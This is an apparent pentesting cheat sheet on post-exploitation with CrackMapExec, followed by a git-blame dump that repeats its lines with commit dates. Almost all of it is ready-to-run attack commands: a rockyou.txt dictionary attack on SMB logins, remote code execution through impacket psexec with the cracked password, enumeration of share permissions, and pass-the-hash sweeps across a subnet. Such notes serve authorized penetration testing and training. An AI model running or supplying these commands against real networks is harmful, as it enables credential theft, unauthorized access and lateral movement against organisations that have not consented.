killchain-compendium/post_exploitation/docs/crackmapexec.md

# Crackmapexec

* Dictionary attack against SMB
```sh 
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
* Use the password with `impacket/examples/psexec.py` in the following way
```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```

## Shares

* Check user permissions on shares
``sh
crackmapexec  smb 10.200.x.0/24 -u <user> -p <password> --shares
```

## SMB
* Check user hash on the network via smb
```sh
 crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```
bump 2021-11-04 17:19:58 +01:00			`# Crackmapexec`

			`* Dictionary attack against SMB`
			```sh
			`cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt`
			```
bump 2021-11-04 17:35:57 +01:00			* Use the password with `impacket/examples/psexec.py` in the following way
			```sh
			`psexec.py domain.name/<user>:<password>@<target-IP>`
			```
pickle 2021-12-04 00:26:03 +01:00
new stuff 2022-04-14 01:06:16 +02:00			`## Shares`

			`* Check user permissions on shares`
			``sh
			`crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares`
			```

pickle 2021-12-04 00:26:03 +01:00			`## SMB`
			`* Check user hash on the network via smb`
			```sh
			`crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>`
			```
new stuff 2022-04-14 01:06:16 +02:00